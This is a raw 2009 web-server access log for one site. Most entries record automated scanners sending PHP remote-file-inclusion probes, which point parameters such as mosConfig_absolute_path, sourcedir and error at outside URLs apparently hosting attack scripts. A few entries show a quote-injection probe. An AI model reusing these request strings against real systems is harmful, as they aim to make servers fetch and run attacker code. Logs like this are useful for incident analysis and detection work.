87.106.249.217 - - [04/Jul/2009:06:52:13 -0700] "GET /logs//////?mosConfig_absolute_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 200 1662 "-" "Mozilla/5.0" "hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:06:53:25 -0700] "GET /////?mosConfig_absolute_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 200 782 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:06:53:29 -0700] "GET /logs//////?mosConfig_absolute_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 200 1662 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:06:53:30 -0700] "GET /logs/scripts.log%20%20//////?mosConfig_absolute_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:53:39 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:53:45 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:54:27 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:54:27 -0700] "GET /include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:06:54:27 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:06:55:43 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:06:57:24 -0700] "GET /logs/access.log//////?mosConfig_absolute_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:06:57:27 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:06:57:27 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:06:57:27 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:06:57:32 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:06:57:33 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:06:57:33 -0700] "GET /logs/access.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:06:57:46 -0700] "GET /logs/access.log//////?mosConfig_absolute_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:06:58:18 -0700] "GET /logs/scripts.log//////?mosConfig_absolute_path=http://www.geocities.com/angie.cayo/spread.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:07:00:00 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:07:03:20 -0700] "GET /logs/access.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:07:03:20 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:07:03:20 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
213.92.118.28 - - [04/Jul/2009:07:07:03 -0700] "GET /admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
213.92.118.28 - - [04/Jul/2009:07:07:03 -0700] "GET /logs//admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
213.92.118.28 - - [04/Jul/2009:07:07:09 -0700] "GET /logs/access.log%20%20//admin/classes/errors.php?error=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:09:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:09:25 -0700] "GET /phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:09:25 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.110.147.217 - - [04/Jul/2009:07:11:26 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.110.147.217 - - [04/Jul/2009:07:11:33 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.110.147.217 - - [04/Jul/2009:07:11:33 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:16:08 -0700] "GET //vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:16:08 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:16:08 -0700] "GET /logs///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:16:09 -0700] "GET //vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:16:09 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:16:09 -0700] "GET /logs///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
65.55.106.238 - - [04/Jul/2009:07:16:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "hellionindustries.com"
82.194.87.219 - - [04/Jul/2009:07:16:27 -0700] "GET /logs//index1.php?menu=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:07:16:52 -0700] "GET /logs/access_090521.log///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:07:16:52 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
210.109.103.174 - - [04/Jul/2009:07:16:52 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
217.125.38.117 - - [04/Jul/2009:07:17:00 -0700] "GET /index1.php?menu=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
217.125.38.117 - - [04/Jul/2009:07:17:18 -0700] "GET /index1.php?menu=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:19:16 -0700] "GET /logs/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:19:16 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:19:16 -0700] "GET /phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
82.194.87.219 - - [04/Jul/2009:07:21:20 -0700] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:21:34 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:21:41 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:22:00 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
82.194.87.219 - - [04/Jul/2009:07:23:23 -0700] "GET /logs//index1.php?menu=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "hellionindustries.com"
82.194.87.219 - - [04/Jul/2009:07:24:18 -0700] "GET /logs//dm-albums/template/album.php?SECURITY_FILE=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:25:06 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:25:06 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:25:06 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:25:25 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:25:25 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:25:25 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
209.97.221.30 - - [04/Jul/2009:07:26:22 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.97.221.30 - - [04/Jul/2009:07:26:22 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.97.221.30 - - [04/Jul/2009:07:26:22 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nadielotiene.es//cache/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.97.206.137 - - [04/Jul/2009:07:28:15 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "hellionindustries.com"
89.97.206.137 - - [04/Jul/2009:07:28:15 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "hellionindustries.com"
89.97.206.137 - - [04/Jul/2009:07:28:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:29:29 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:29:29 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:29:29 -0700] "GET /logs/access_090212.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:29:55 -0700] "GET /logs/access_090212.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:29:55 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
125.251.147.130 - - [04/Jul/2009:07:29:55 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
89.97.206.137 - - [04/Jul/2009:07:30:47 -0700] "GET /logs/scripts.log//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.hellionindustries.com"
89.97.206.137 - - [04/Jul/2009:07:30:47 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.hellionindustries.com"
89.97.206.137 - - [04/Jul/2009:07:30:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:31:45 -0700] "GET /?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:31:45 -0700] "GET /logs/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:31:45 -0700] "GET /logs/access.log%20%20/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:31:45 -0700] "GET /?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:31:46 -0700] "GET /logs/access.log/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:31:46 -0700] "GET /logs/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "hellionindustries.com"
217.125.38.117 - - [04/Jul/2009:07:32:52 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:33:11 -0700] "GET /errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:33:11 -0700] "GET /logs/access.log/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:33:12 -0700] "GET /logs/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:33:31 -0700] "GET /logs/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:33:31 -0700] "GET /?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:33:32 -0700] "GET /logs/access.log/?sourcedir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
82.194.87.219 - - [04/Jul/2009:07:34:13 -0700] "GET /logs//index1.php?menu=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "hellionindustries.com"
125.160.17.33 - - [04/Jul/2009:07:34:14 -0700] "GET /logs/access.log HTTP/1.0" 200 69736 "http://www.google.co.id/search?hl=id&q=%22GET+%2Flogs%2Faccess.log&btnG=Telusuri&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99" "www.hellionindustries.com"
89.97.206.137 - - [04/Jul/2009:07:34:19 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.hellionindustries.com"
89.97.206.137 - - [04/Jul/2009:07:34:19 -0700] "GET /logs/access.log%22%20%20target=%22_blank//skin/zero_vote/ask_password.php?dir=http://www.kbiguni.org/bbs/data/research_press/fid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:34:19 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:34:19 -0700] "GET /logs/access_090521.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:34:19 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:34:19 -0700] "GET /logs/access_090212.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
125.160.17.33 - - [04/Jul/2009:07:34:22 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99" "www.hellionindustries.com"
125.160.17.33 - - [04/Jul/2009:07:34:25 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:34:30 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:34:30 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:34:30 -0700] "GET /logs/access_090212.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:34:30 -0700] "GET /logs/access_090521.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:34:31 -0700] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:34:31 -0700] "GET /logs/access.log%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:34:32 -0700] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:35:50 -0700] "GET /errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:35:50 -0700] "GET /logs/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:35:55 -0700] "GET /logs/access.log%20%20/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:36:14 -0700] "GET /?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:36:14 -0700] "GET /logs/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:36:21 -0700] "GET /logs/access_090212.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:36:21 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:36:21 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.23.158.226 - - [04/Jul/2009:07:36:21 -0700] "GET /logs/access_090521.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:36:42 -0700] "GET /logs/access.log%20%20/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:39:10 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
